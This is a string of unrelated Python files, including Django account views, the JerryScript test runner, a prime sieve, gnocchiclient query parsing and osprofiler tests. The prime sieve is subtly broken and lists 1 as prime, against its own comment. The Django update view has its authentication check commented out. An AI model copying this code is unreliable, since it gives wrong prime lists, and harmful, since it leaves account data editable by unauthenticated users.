                [270.0, 150.0, "a string", True, "", 10.0, 15.0, 33.0],
                [280.0, 100.0, "AAAAA", False, "", 51.0, 44.5, None],
                [
                    300.0,
                    1.2e-05,
                    "a string_3",
                    True,
                    "BB",
                    101.0,
                    -15100000.0,
                    None,
                ],
            ],
        }
        self.assertEqual(expected_result, body)


if __name__ == "__main__":
    tf.test.main()

#!/usr/bin/python
#
#  Copyright 2002-2019 Barcelona Supercomputing Center (www.bsc.es)
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from exaqute.ExaquteTask import *

from pycompss.api.task import task
from pycompss.api.api import compss_wait_on
from pycompss.api.api import compss_barrier
from pycompss.api.api import compss_delete_object
from pycompss.api.api import compss_delete_file

from pycompss.api.parameter import *

from pycompss.api.implement import implement

from pycompss.api.constraint import *


class ExaquteTask(object):

    def __init__(self, *args, **kwargs):
        global scheduler
        scheduler = "Current scheduler is PyCOMPSs"
        self.task_instance = task(*args, **kwargs)

    def __call__(self, f):
        return self.task_instance.__call__(f)


def barrier():  # Wait
    compss_barrier()


def get_value_from_remote(obj):  # Gather
    obj = compss_wait_on(obj)
    return obj


def delete_object(obj):  # Release
    compss_delete_object(obj)


def delete_file(file_path):
    compss_delete_file(file_path)


def compute(obj):  # Submit task
    return obj

from rest_framework import generics, permissions, views, response,status
from .models import Account
from .serializers import AccountCreateSerializer, AccountSerializer, AuthenticateSerializer, \
    UpdateAccountSerializer, AccountRetrieveSerializer


# Create your views here.


class AccountCreateView(generics.CreateAPIView):
    queryset = Account.objects.all()
    serializer_class = AccountCreateSerializer
    permission_classes = [permissions.AllowAny]


class AccountListView(generics.ListAPIView):
    queryset = Account.objects.all()
    serializer_class = AccountSerializer
    permission_classes = [permissions.IsAuthenticated]


class AccountRetrieveView(generics.RetrieveAPIView):
    queryset = Account.objects.all()
    serializer_class = AccountRetrieveSerializer


class UpdateAccountView(generics.UpdateAPIView):
    queryset = Account.objects.all()
    serializer_class = UpdateAccountSerializer
    # permission_classes = [permissions.IsAuthenticated]


class AccountAuthenticationView(views.APIView):
    queryset = Account.objects.all()
    serializer_class = AuthenticateSerializer

    def post(self, request):
        data = request.data
        serializer = AuthenticateSerializer(data=data)
        if serializer.is_valid(raise_exception=True):
            new_date = serializer.data
            return response.Response(new_date,status=status.HTTP_200_OK)
        return response.Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

__author__ = 'litleleprikon'


from random import randint


FIGURES = ['камень', 'бумага', 'ножницы']
FIG_LEN = len(FIGURES)

class Player:
    """
    Player class is needed to store tactics and to generate figures by this tactic

    -- Doctests --
    >>> player = Player()
    >>> player.figure in FIGURES
    True
    """
    def __init__(self, number: int):
        self.name = 'игрок{}'.format(number)
        tactic = randint(0, FIG_LEN-1)
        self.main_figure = FIGURES[tactic]
        self.__figures = [FIGURES[(tactic+i) % FIG_LEN] for i in range(FIG_LEN)]

    def __str__(self):
        return '{}: {}'.format(self.name, self.main_figure)

    @property
    def figure(self):
        rand = randint(0, FIG_LEN)
        return self.__figures[rand % FIG_LEN]

#!/usr/bin/env python

# Copyright JS Foundation and other contributors, http://js.foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import print_function

import argparse
import collections
import hashlib
import os
import subprocess
import sys
import settings

OUTPUT_DIR = os.path.join(settings.PROJECT_DIR, 'build', 'tests')

Options = collections.namedtuple('Options', ['name', 'build_args', 'test_args'])
Options.__new__.__defaults__ = ([], [])

OPTIONS_PROFILE_MIN = ['--profile=minimal']
OPTIONS_PROFILE_ES51 = [] # NOTE: same as ['--profile=es5.1']
OPTIONS_PROFILE_ES2015 = ['--profile=es2015-subset']
OPTIONS_DEBUG = ['--debug']
OPTIONS_SNAPSHOT = ['--snapshot-save=on', '--snapshot-exec=on', '--jerry-cmdline-snapshot=on']
OPTIONS_UNITTESTS = ['--unittests=on', '--jerry-cmdline=off', '--error-messages=on',
                     '--snapshot-save=on', '--snapshot-exec=on', '--vm-exec-stop=on',
                     '--line-info=on', '--mem-stats=on']
OPTIONS_DOCTESTS = ['--doctests=on', '--jerry-cmdline=off', '--error-messages=on',
                    '--snapshot-save=on', '--snapshot-exec=on', '--vm-exec-stop=on']

# Test options for unittests
JERRY_UNITTESTS_OPTIONS = [
    Options('unittests-es2015_subset',
            OPTIONS_UNITTESTS + OPTIONS_PROFILE_ES2015),
    Options('unittests-es2015_subset-debug',
            OPTIONS_UNITTESTS + OPTIONS_PROFILE_ES2015 + OPTIONS_DEBUG),
    Options('doctests-es2015_subset',
            OPTIONS_DOCTESTS + OPTIONS_PROFILE_ES2015),
    Options('doctests-es2015_subset-debug',
            OPTIONS_DOCTESTS + OPTIONS_PROFILE_ES2015 + OPTIONS_DEBUG),
    Options('unittests-es5.1',
            OPTIONS_UNITTESTS + OPTIONS_PROFILE_ES51),
    Options('unittests-es5.1-debug',
            OPTIONS_UNITTESTS + OPTIONS_PROFILE_ES51 + OPTIONS_DEBUG),
    Options('doctests-es5.1',
            OPTIONS_DOCTESTS + OPTIONS_PROFILE_ES51),
    Options('doctests-es5.1-debug',
            OPTIONS_DOCTESTS + OPTIONS_PROFILE_ES51 + OPTIONS_DEBUG)
]

# Test options for jerry-tests
JERRY_TESTS_OPTIONS = [
    Options('jerry_tests-es5.1',
            OPTIONS_PROFILE_ES51),
    Options('jerry_tests-es5.1-snapshot',
            OPTIONS_PROFILE_ES51 + OPTIONS_SNAPSHOT,
            ['--snapshot']),
    Options('jerry_tests-es5.1-debug',
            OPTIONS_PROFILE_ES51 + OPTIONS_DEBUG),
    Options('jerry_tests-es5.1-debug-snapshot',
            OPTIONS_PROFILE_ES51 + OPTIONS_SNAPSHOT + OPTIONS_DEBUG,
            ['--snapshot']),
    Options('jerry_tests-es5.1-debug-cpointer_32bit',
            OPTIONS_PROFILE_ES51 + OPTIONS_DEBUG + ['--cpointer-32bit=on', '--mem-heap=1024']),
    Options('jerry_tests-es5.1-debug-external_context',
            OPTIONS_PROFILE_ES51 + OPTIONS_DEBUG + ['--jerry-libc=off', '--external-context=on']),
    Options('jerry_tests-es2015_subset-debug',
            OPTIONS_PROFILE_ES2015 + OPTIONS_DEBUG),
]

# Test options for jerry-test-suite
JERRY_TEST_SUITE_OPTIONS = JERRY_TESTS_OPTIONS[:]
JERRY_TEST_SUITE_OPTIONS.extend([
    Options('jerry_test_suite-minimal',
            OPTIONS_PROFILE_MIN),
    Options('jerry_test_suite-minimal-snapshot',
            OPTIONS_PROFILE_MIN + OPTIONS_SNAPSHOT,
            ['--snapshot']),
    Options('jerry_test_suite-minimal-debug',
            OPTIONS_PROFILE_MIN + OPTIONS_DEBUG),
    Options('jerry_test_suite-minimal-debug-snapshot',
            OPTIONS_PROFILE_MIN + OPTIONS_SNAPSHOT + OPTIONS_DEBUG,
            ['--snapshot']),
    Options('jerry_test_suite-es2015_subset',
            OPTIONS_PROFILE_ES2015),
    Options('jerry_test_suite-es2015_subset-snapshot',
            OPTIONS_PROFILE_ES2015 + OPTIONS_SNAPSHOT,
            ['--snapshot']),
    Options('jerry_test_suite-es2015_subset-debug-snapshot',
            OPTIONS_PROFILE_ES2015 + OPTIONS_SNAPSHOT + OPTIONS_DEBUG,
            ['--snapshot']),
])

# Test options for test262
TEST262_TEST_SUITE_OPTIONS = [
    Options('test262_tests')
]

# Test options for jerry-debugger
DEBUGGER_TEST_OPTIONS = [
    Options('jerry_debugger_tests',
            ['--debug', '--jerry-debugger=on', '--jerry-libc=off'])
]

# Test options for buildoption-test
JERRY_BUILDOPTIONS = [
    Options('buildoption_test-lto',
            ['--lto=on']),
    Options('buildoption_test-error_messages',
            ['--error-messages=on']),
    Options('buildoption_test-all_in_one',
            ['--all-in-one=on']),
    Options('buildoption_test-valgrind',
            ['--valgrind=on']),
    Options('buildoption_test-mem_stats',
            ['--mem-stats=on']),
    Options('buildoption_test-show_opcodes',
            ['--show-opcodes=on']),
    Options('buildoption_test-show_regexp_opcodes',
            ['--show-regexp-opcodes=on']),
    Options('buildoption_test-compiler_default_libc',
            ['--jerry-libc=off']),
    Options('buildoption_test-cpointer_32bit',
            ['--jerry-libc=off', '--compile-flag=-m32', '--cpointer-32bit=on', '--system-allocator=on']),
    Options('buildoption_test-external_context',
            ['--jerry-libc=off', '--external-context=on']),
    Options('buildoption_test-shared_libs',
            ['--jerry-libc=off', '--shared-libs=on']),
    Options('buildoption_test-cmdline_test',
            ['--jerry-cmdline-test=on']),
    Options('buildoption_test-cmdline_snapshot',
            ['--jerry-cmdline-snapshot=on']),
]

def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument('--toolchain', metavar='FILE',
                        help='Add toolchain file')
    parser.add_argument('-q', '--quiet', action='store_true',
                        help='Only print out failing tests')
    parser.add_argument('--buildoptions', metavar='LIST',
                        help='Add a comma separated list of extra build options to each test')
    parser.add_argument('--skip-list', metavar='LIST',
                        help='Add a comma separated list of patterns of the excluded JS-tests')
    parser.add_argument('--outdir', metavar='DIR', default=OUTPUT_DIR,
                        help='Specify output directory (default: %(default)s)')
    parser.add_argument('--check-signed-off', metavar='TYPE', nargs='?',
                        choices=['strict', 'tolerant', 'travis'], const='strict',
                        help='Run signed-off check (%(choices)s; default type if not given: %(const)s)')
    parser.add_argument('--check-cppcheck', action='store_true',
                        help='Run cppcheck')
    parser.add_argument('--check-doxygen', action='store_true',
                        help='Run doxygen')
    parser.add_argument('--check-pylint', action='store_true',
                        help='Run pylint')
    parser.add_argument('--check-vera', action='store_true',
                        help='Run vera check')
    parser.add_argument('--check-license', action='store_true',
                        help='Run license check')
    parser.add_argument('--check-magic-strings', action='store_true',
                        help='Run "magic string source code generator should be executed" check')
    parser.add_argument('--jerry-debugger', action='store_true',
                        help='Run jerry-debugger tests')
    parser.add_argument('--jerry-tests', action='store_true',
                        help='Run jerry-tests')
    parser.add_argument('--jerry-test-suite', action='store_true',
                        help='Run jerry-test-suite')
    parser.add_argument('--test262', action='store_true',
                        help='Run test262')
    parser.add_argument('--unittests', action='store_true',
                        help='Run unittests (including doctests)')
    parser.add_argument('--buildoption-test', action='store_true',
                        help='Run buildoption-test')
    parser.add_argument('--all', '--precommit', action='store_true',
                        help='Run all tests')

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    script_args = parser.parse_args()

    return script_args

BINARY_CACHE = {}

def create_binary(job, options):
    build_args = job.build_args[:]
    if options.buildoptions:
        for option in options.buildoptions.split(','):
            if option not in build_args:
                build_args.append(option)

    build_cmd = [settings.BUILD_SCRIPT] + build_args

    build_dir_path = os.path.join(options.outdir, job.name)
    build_cmd.append('--builddir=%s' % build_dir_path)

    install_dir_path = os.path.join(build_dir_path, 'local')
    build_cmd.append('--install=%s' % install_dir_path)

    if options.toolchain:
        build_cmd.append('--toolchain=%s' % options.toolchain)

    sys.stderr.write('Build command: %s\n' % ' '.join(build_cmd))

    binary_key = tuple(sorted(build_args))
    if binary_key in BINARY_CACHE:
        ret, build_dir_path = BINARY_CACHE[binary_key]
        sys.stderr.write('(skipping: already built at %s with returncode %d)\n' % (build_dir_path, ret))
        return ret, build_dir_path

    try:
        subprocess.check_output(build_cmd)
        ret = 0
    except subprocess.CalledProcessError as err:
        ret = err.returncode

    BINARY_CACHE[binary_key] = (ret, build_dir_path)
    return ret, build_dir_path

def get_binary_path(build_dir_path):
    return os.path.join(build_dir_path, 'local', 'bin', 'jerry')

def hash_binary(bin_path):
    blocksize = 65536
    hasher = hashlib.sha1()
    with open(bin_path, 'rb') as bin_file:
        buf = bin_file.read(blocksize)
        while len(buf) > 0:
            hasher.update(buf)
            buf = bin_file.read(blocksize)
    return hasher.hexdigest()

def iterate_test_runner_jobs(jobs, options):
    tested_paths = set()
    tested_hashes = {}

    for job in jobs:
        ret_build, build_dir_path = create_binary(job, options)
        if ret_build:
            yield job, ret_build, build_dir_path, None

        if build_dir_path in tested_paths:
            sys.stderr.write('(skipping: already tested with %s)\n' % build_dir_path)
            continue
        else:
            tested_paths.add(build_dir_path)

        bin_path = get_binary_path(build_dir_path)
        bin_hash = hash_binary(bin_path)

        if bin_hash in tested_hashes:
            sys.stderr.write('(skipping: already tested with equivalent %s)\n' % tested_hashes[bin_hash])
            continue
        else:
            tested_hashes[bin_hash] = build_dir_path

        test_cmd = [settings.TEST_RUNNER_SCRIPT, bin_path]

        yield job, ret_build, test_cmd

def run_check(runnable):
    sys.stderr.write('Test command: %s\n' % ' '.join(runnable))

    try:
        ret = subprocess.check_call(runnable)
    except subprocess.CalledProcessError as err:
        return err.returncode

    return ret

def run_jerry_debugger_tests(options):
    ret_build = ret_test = 0
    for job in DEBUGGER_TEST_OPTIONS:
        ret_build, build_dir_path = create_binary(job, options)
        if ret_build:
            break

        for test_file in os.listdir(settings.DEBUGGER_TESTS_DIR):
            if test_file.endswith(".cmd"):
                test_case, _ = os.path.splitext(test_file)
                test_case_path = os.path.join(settings.DEBUGGER_TESTS_DIR, test_case)
                test_cmd = [
                    settings.DEBUGGER_TEST_RUNNER_SCRIPT,
                    get_binary_path(build_dir_path),
                    settings.DEBUGGER_CLIENT_SCRIPT,
                    os.path.relpath(test_case_path, settings.PROJECT_DIR)
                ]

                if job.test_args:
                    test_cmd.extend(job.test_args)

                ret_test |= run_check(test_cmd)

    return ret_build | ret_test

def run_jerry_tests(options):
    ret_build = ret_test = 0
    for job, ret_build, test_cmd in iterate_test_runner_jobs(JERRY_TESTS_OPTIONS, options):
        if ret_build:
            break

        test_cmd.append(settings.JERRY_TESTS_DIR)

        if options.quiet:
            test_cmd.append("-q")

        skip_list = []

        if '--profile=es2015-subset' in job.build_args:
            skip_list.append(r"es5.1\/")
        else:
            skip_list.append(r"es2015\/")

        if options.skip_list:
            skip_list.append(options.skip_list)

        if skip_list:
            test_cmd.append("--skip-list=" + ",".join(skip_list))

        if job.test_args:
            test_cmd.extend(job.test_args)

        ret_test |= run_check(test_cmd)

    return ret_build | ret_test

def run_jerry_test_suite(options):
    ret_build = ret_test = 0
    for job, ret_build, test_cmd in iterate_test_runner_jobs(JERRY_TEST_SUITE_OPTIONS, options):
        if ret_build:
            break

        if '--profile=minimal' in job.build_args:
            test_cmd.append(settings.JERRY_TEST_SUITE_MINIMAL_LIST)
        elif '--profile=es2015-subset' in job.build_args:
            test_cmd.append(settings.JERRY_TEST_SUITE_DIR)
        else:
            test_cmd.append(settings.JERRY_TEST_SUITE_ES51_LIST)

        if options.quiet:
            test_cmd.append("-q")

        if options.skip_list:
            test_cmd.append("--skip-list=" + options.skip_list)

        if job.test_args:
            test_cmd.extend(job.test_args)

        ret_test |= run_check(test_cmd)

    return ret_build | ret_test

def run_test262_test_suite(options):
    ret_build = ret_test = 0
    for job in TEST262_TEST_SUITE_OPTIONS:
        ret_build, build_dir_path = create_binary(job, options)
        if ret_build:
            break

        test_cmd = [
            settings.TEST262_RUNNER_SCRIPT,
            get_binary_path(build_dir_path),
            settings.TEST262_TEST_SUITE_DIR
        ]

        if job.test_args:
            test_cmd.extend(job.test_args)

        ret_test |= run_check(test_cmd)

    return ret_build | ret_test

def run_unittests(options):
    ret_build = ret_test = 0
    for job in JERRY_UNITTESTS_OPTIONS:
        ret_build, build_dir_path = create_binary(job, options)
        if ret_build:
            break

        ret_test |= run_check([
            settings.UNITTEST_RUNNER_SCRIPT,
            os.path.join(build_dir_path, 'tests'),
            "-q" if options.quiet else "",
        ])

    return ret_build | ret_test

def run_buildoption_test(options):
    for job in JERRY_BUILDOPTIONS:
        ret, _ = create_binary(job, options)
        if ret:
            break

    return ret

Check = collections.namedtuple('Check', ['enabled', 'runner', 'arg'])

def main(options):
    checks = [
        Check(options.check_signed_off, run_check, [settings.SIGNED_OFF_SCRIPT]
              + {'tolerant': ['--tolerant'], 'travis': ['--travis']}.get(options.check_signed_off, [])),
        Check(options.check_cppcheck, run_check, [settings.CPPCHECK_SCRIPT]),
        Check(options.check_doxygen, run_check, [settings.DOXYGEN_SCRIPT]),
        Check(options.check_pylint, run_check, [settings.PYLINT_SCRIPT]),
        Check(options.check_vera, run_check, [settings.VERA_SCRIPT]),
        Check(options.check_license, run_check, [settings.LICENSE_SCRIPT]),
        Check(options.check_magic_strings, run_check, [settings.MAGIC_STRINGS_SCRIPT]),
        Check(options.jerry_debugger, run_jerry_debugger_tests, options),
        Check(options.jerry_tests, run_jerry_tests, options),
        Check(options.jerry_test_suite, run_jerry_test_suite, options),
        Check(options.test262, run_test262_test_suite, options),
        Check(options.unittests, run_unittests, options),
        Check(options.buildoption_test, run_buildoption_test, options),
    ]

    for check in checks:
        if check.enabled or options.all:
            ret = check.runner(check.arg)
            if ret:
                sys.exit(ret)

if __name__ == "__main__":
    main(get_arguments())

import math


def isPrime(num):
    if num < 2:
        return False  # 0, 1不是质数

    # num为100时, 它是不可能有因子是大于50的. 比如说60 * ? = 100, 这是不可能的, 所以这里只要比较sqrt(), 平方根
    boundary = int(math.sqrt(num)) + 1
    for i in range(2, boundary):
        if num % i == 0:
            return False

    return True

def primeSieve(size):
    sieve = [True] * size # 某格一为乘积, 就置为False
    sieve[0] = False
    sieve[1] = True

    # num为100时, 它是不可能有因子是大于50的. 比如说60 * ? = 100, 这是不可能的, 所以这里只要比较sqrt(), 平方根
    boundary = int(math.sqrt(size)) + 1
    for i in range(2, boundary):
        pointer = i * 2  # startPosition. 以3为例, 3其实是质数, 但它的位数6,9, 12, ...都不是质数
        while pointer < size:
            sieve[pointer] = False
            pointer += i


    ret = [] # contains all the prime number within "size"
    for i in range(size):
        if sieve[i] == True:
            ret.append(str(i))
    return ret


if __name__ == '__main__':
    primes = primeSieve(100)
    primesString = ", ".join(primes)
    print("prime : ", primesString)

'''
prime :  1, 2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97
'''
# -*- encoding: utf-8 -*-
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.


import pyparsing as pp

uninary_operators = ("not", )
binary_operator = (u">=", u"<=", u"!=", u">", u"<", u"=", u"==", u"eq", u"ne",
                   u"lt", u"gt", u"ge", u"le", u"in", u"like", u"≠", u"≥",
                   u"≤", u"like" "in")
multiple_operators = (u"and", u"or", u"∧", u"∨")

operator = pp.Regex(u"|".join(binary_operator))
null = pp.Regex("None|none|null").setParseAction(pp.replaceWith(None))
boolean = "False|True|false|true"
boolean = pp.Regex(boolean).setParseAction(lambda t: t[0].lower() == "true")
hex_string = lambda n: pp.Word(pp.hexnums, exact=n)
uuid = pp.Combine(hex_string(8) + ("-" + hex_string(4)) * 3 +
                  "-" + hex_string(12))
number = r"[+-]?\d+(:?\.\d*)?(:?[eE][+-]?\d+)?"
number = pp.Regex(number).setParseAction(lambda t: float(t[0]))
identifier = pp.Word(pp.alphas, pp.alphanums + "_")
quoted_string = pp.QuotedString('"') | pp.QuotedString("'")
comparison_term = pp.Forward()
in_list = pp.Group(pp.Suppress('[') +
                   pp.Optional(pp.delimitedList(comparison_term)) +
                   pp.Suppress(']'))("list")
comparison_term << (null | boolean | uuid | identifier | number |
                    quoted_string | in_list)
condition = pp.Group(comparison_term + operator + comparison_term)

expr = pp.operatorPrecedence(condition, [
    ("not", 1, pp.opAssoc.RIGHT, ),
    ("and", 2, pp.opAssoc.LEFT, ),
    ("∧", 2, pp.opAssoc.LEFT, ),
    ("or", 2, pp.opAssoc.LEFT, ),
    ("∨", 2, pp.opAssoc.LEFT, ),
])


def _parsed_query2dict(parsed_query):
    result = None
    while parsed_query:
        part = parsed_query.pop()
        if part in binary_operator:
            result = {part: {parsed_query.pop(): result}}

        elif part in multiple_operators:
            if result.get(part):
                result[part].append(
                    _parsed_query2dict(parsed_query.pop()))
            else:
                result = {part: [result]}

        elif part in uninary_operators:
            result = {part: result}
        elif isinstance(part, pp.ParseResults):
            kind = part.getName()
            if kind == "list":
                res = part.asList()
            else:
                res = _parsed_query2dict(part)
            if result is None:
                result = res
            elif isinstance(result, dict):
                list(result.values())[0].append(res)
        else:
            result = part
    return result


def search_query_builder(query):
    parsed_query = expr.parseString(query)[0]
    return _parsed_query2dict(parsed_query)


def list2cols(cols, objs):
    return cols, [tuple([o[k] for k in cols])
                  for o in objs]


def format_string_list(objs, field):
    objs[field] = ", ".join(objs[field])


def format_dict_list(objs, field):
    objs[field] = "\n".join(
        "- " + ", ".join("%s: %s" % (k, v)
                         for k, v in elem.items())
        for elem in objs[field])


def format_move_dict_to_root(obj, field):
    for attr in obj[field]:
        obj["%s/%s" % (field, attr)] = obj[field][attr]
    del obj[field]


def format_archive_policy(ap):
    format_dict_list(ap, "definition")
    format_string_list(ap, "aggregation_methods")


def dict_from_parsed_args(parsed_args, attrs):
    d = {}
    for attr in attrs:
        value = getattr(parsed_args, attr)
        if value is not None:
            d[attr] = value
    return d


def dict_to_querystring(objs):
    return "&".join(["%s=%s" % (k, v)
                     for k, v in objs.items()
                     if v is not None])

# Copyright 2013 - Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from solum import objects

from solum.objects import extension as abstract_extension
from solum.objects import operation as abstract_operation
from solum.objects import plan as abstract_plan
from solum.objects import sensor as abstract_sensor
from solum.objects import service as abstract_srvc
from solum.objects.sqlalchemy import extension
from solum.objects.sqlalchemy import operation
from solum.objects.sqlalchemy import plan
from solum.objects.sqlalchemy import sensor
from solum.objects.sqlalchemy import service


def load():
    """Activate the sqlalchemy backend."""
    objects.registry.add(abstract_plan.Plan, plan.Plan)
    objects.registry.add(abstract_plan.PlanList, plan.PlanList)
    objects.registry.add(abstract_srvc.Service, service.Service)
    objects.registry.add(abstract_srvc.ServiceList, service.ServiceList)
    objects.registry.add(abstract_operation.Operation, operation.Operation)
    objects.registry.add(abstract_operation.OperationList,
                         operation.OperationList)
    objects.registry.add(abstract_sensor.Sensor, sensor.Sensor)
    objects.registry.add(abstract_sensor.SensorList, sensor.SensorList)
    objects.registry.add(abstract_extension.Extension, extension.Extension)
    objects.registry.add(abstract_extension.ExtensionList,
                         extension.ExtensionList)

default_app_config = 'providers.com.dailyssrn.apps.AppConfig'

# -*- coding:utf-8 -*-
#
# Copyright (c) 2017 mooncake. All Rights Reserved
####
# @brief
# @author Eric Yue ( hi.moonlight@gmail.com )
# @version 0.0.1
from distutils.core import setup

V = "0.7"

setup(
  name = 'mooncake_utils',
  packages = ['mooncake_utils'], 
  version = V,
  description = 'just a useful utils for mooncake personal project.',
  author = 'mooncake',
  author_email = 'hi.moonlight@gmail.com',
  url = 'https://github.com/ericyue/mooncake_utils', 
  download_url = 'https://github.com/ericyue/mooncake_utils/archive/%s.zip' % V, 
  keywords = ['utils','data','machine-learning'], # arbitrary keywords
  classifiers = [],
)

# Copyright 2014 Mirantis Inc.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import collections
import copy
import datetime
import re

import mock
import six

from osprofiler import profiler
from osprofiler.tests import test


class ProfilerGlobMethodsTestCase(test.TestCase):

    def test_get_profiler_not_inited(self):
        profiler.clean()
        self.assertIsNone(profiler.get())

    def test_get_profiler_and_init(self):
        p = profiler.init("secret", base_id="1", parent_id="2")
        self.assertEqual(profiler.get(), p)

        self.assertEqual(p.get_base_id(), "1")
        # NOTE(boris-42): until we make first start we don't have
        self.assertEqual(p.get_id(), "2")

    def test_start_not_inited(self):
        profiler.clean()
        profiler.start("name")

    def test_start(self):
        p = profiler.init("secret", base_id="1", parent_id="2")
        p.start = mock.MagicMock()
        profiler.start("name", info="info")
        p.start.assert_called_once_with("name", info="info")

    def test_stop_not_inited(self):
        profiler.clean()
        profiler.stop()

    def test_stop(self):
        p = profiler.init("secret", base_id="1", parent_id="2")
        p.stop = mock.MagicMock()
        profiler.stop(info="info")
        p.stop.assert_called_once_with(info="info")


class ProfilerTestCase(test.TestCase):

    def test_profiler_get_shorten_id(self):
        uuid_id = "4e3e0ec6-2938-40b1-8504-09eb1d4b0dee"
        prof = profiler._Profiler("secret", base_id="1", parent_id="2")
        result = prof.get_shorten_id(uuid_id)
        expected = "850409eb1d4b0dee"
        self.assertEqual(expected, result)

    def test_profiler_get_shorten_id_int(self):
        short_id_int = 42
        prof = profiler._Profiler("secret", base_id="1", parent_id="2")
        result = prof.get_shorten_id(short_id_int)
        expected = "2a"
        self.assertEqual(expected, result)

    def test_profiler_get_base_id(self):
        prof = profiler._Profiler("secret", base_id="1", parent_id="2")
        self.assertEqual(prof.get_base_id(), "1")

    @mock.patch("osprofiler.profiler.uuidutils.generate_uuid")
    def test_profiler_get_parent_id(self, mock_generate_uuid):
        mock_generate_uuid.return_value = "42"
        prof = profiler._Profiler("secret", base_id="1", parent_id="2")
        prof.start("test")
        self.assertEqual(prof.get_parent_id(), "2")

    @mock.patch("osprofiler.profiler.uuidutils.generate_uuid")
    def test_profiler_get_base_id_unset_case(self, mock_generate_uuid):
        mock_generate_uuid.return_value = "42"
        prof = profiler._Profiler("secret")
        self.assertEqual(prof.get_base_id(), "42")
        self.assertEqual(prof.get_parent_id(), "42")

    @mock.patch("osprofiler.profiler.uuidutils.generate_uuid")
    def test_profiler_get_id(self, mock_generate_uuid):
        mock_generate_uuid.return_value = "43"
        prof = profiler._Profiler("secret")
        prof.start("test")
        self.assertEqual(prof.get_id(), "43")

    @mock.patch("osprofiler.profiler.datetime")
    @mock.patch("osprofiler.profiler.uuidutils.generate_uuid")
    @mock.patch("osprofiler.profiler.notifier.notify")
    def test_profiler_start(self, mock_notify, mock_generate_uuid,
                            mock_datetime):
        mock_generate_uuid.return_value = "44"
        now = datetime.datetime.utcnow()
        mock_datetime.datetime.utcnow.return_value = now

        info = {"some": "info"}
        payload = {
            "name": "test-start",
            "base_id": "1",
            "parent_id": "2",
            "trace_id": "44",
            "info": info,
            "timestamp": now.strftime("%Y-%m-%dT%H:%M:%S.%f"),
        }

        prof = profiler._Profiler("secret", base_id="1", parent_id="2")
        prof.start("test", info=info)

        mock_notify.assert_called_once_with(payload)

    @mock.patch("osprofiler.profiler.datetime")
    @mock.patch("osprofiler.profiler.notifier.notify")
    def test_profiler_stop(self, mock_notify, mock_datetime):
        now = datetime.datetime.utcnow()
        mock_datetime.datetime.utcnow.return_value = now
        prof = profiler._Profiler("secret", base_id="1", parent_id="2")
        prof._trace_stack.append("44")
        prof._name.append("abc")

        info = {"some": "info"}
        prof.stop(info=info)

        payload = {
            "name": "abc-stop",
            "base_id": "1",
            "parent_id": "2",
            "trace_id": "44",
            "info": info,
            "timestamp": now.strftime("%Y-%m-%dT%H:%M:%S.%f"),
        }

        mock_notify.assert_called_once_with(payload)
        self.assertEqual(len(prof._name), 0)
        self.assertEqual(prof._trace_stack, collections.deque(["1", "2"]))

    def test_profiler_hmac(self):
        hmac = "secret"
        prof = profiler._Profiler(hmac, base_id="1", parent_id="2")
        self.assertEqual(hmac, prof.hmac_key)


class WithTraceTestCase(test.TestCase):

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_with_trace(self, mock_start, mock_stop):

        with profiler.Trace("a", info="a1"):
            mock_start.assert_called_once_with("a", info="a1")
            mock_start.reset_mock()
            with profiler.Trace("b", info="b1"):
                mock_start.assert_called_once_with("b", info="b1")
            mock_stop.assert_called_once_with()
            mock_stop.reset_mock()
        mock_stop.assert_called_once_with()

    @mock.patch("osprofiler.profiler.stop")
    @mock.patch("osprofiler.profiler.start")
    def test_with_trace_etype(self, mock_start, mock_stop):

        def foo():
            with profiler.Trace("foo"):
                raise ValueError("bar")

        self.assertRaises(ValueError, foo)
        mock_start.assert_called_once_with("foo", info=None)
        mock_stop.assert_called_once_with(info={
            "etype": "ValueError",
            "message": "bar"
        })


@profiler.trace("function", info={"info": "some_info"})
def traced_func(i):
    return i


@profiler.trace("hide_args", hide_args=True)
def trace_hide_args_func(a, i=10):
    return (a, i)


@profiler.trace("foo", hide_args=True)
def test_fn_exc():
    raise ValueError()


@profiler.trace("hide_result", hide_result=False)
def trace_with_result_func(a, i=10):
    return (a, i)


class TraceDecoratorTestCase(test.TestCase):

